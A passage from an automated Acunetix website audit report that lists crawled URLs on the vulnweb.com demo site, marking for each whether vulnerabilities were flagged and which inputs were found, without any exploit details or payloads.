No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/_mmServerScripts/mysql.php
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/404.php
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/adm1nPan3l/
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/adm1nPan3l/index.php
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/admin/
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/admin/create.sql
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/bxss/
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/bxss/adminPan3l/
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/bxss/adminPan3l/index.php
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/bxss/adminPan3l/style.css
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/bxss/cleanDatabase.php
No input(s) found for this URL
160Acunetix Website Audit
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/bxss/database_connect.php
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/bxss/index.php
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/bxss/test.js
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/bxss/vuln.php
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id URL encoded GET
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/clearguestbook.php
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/clientaccesspolicy.xml
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Connections/
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/Connections/DB_Connection.php
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/CVS/
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/CVS/Entries
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/CVS/Entries.Log
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/CVS/Repository
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/CVS/Root
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/database_connect.php
No input(s) found for this URL
161Acunetix Website Audit
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/index.bak
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/pictures/
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/pictures/1.jpg.tn
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/pictures/2.jpg.tn
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/pictures/3.jpg.tn
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/pictures/4.jpg.tn
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/pictures/5.jpg.tn
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/pictures/6.jpg.tn
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/pictures/7.jpg.tn
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/pictures/8.jpg.tn
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/pictures/credentials.txt
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/pictures/ipaddresses.txt
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/pictures/path-disclosure-unix.html
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/pictures/path-disclosure-win.html
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/pictures/wp-config.bak
No input(s) found for this URL
162Acunetix Website Audit
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/pictures/WS_FTP.LOG
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/wvstests/
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/scripts/
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/scripts/version.php
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/medias
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/medias/img
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/medias/css
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/medias/css/main.css
No input(s) found for this URL
No vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/medias/js
No input(s) found for this URL
Vulnerabilities have been identified for this URL
URL: http://testphp.vulnweb.com/medias/js/common_functions.js
No input(s) found for this URL
163Acunetix Website Audit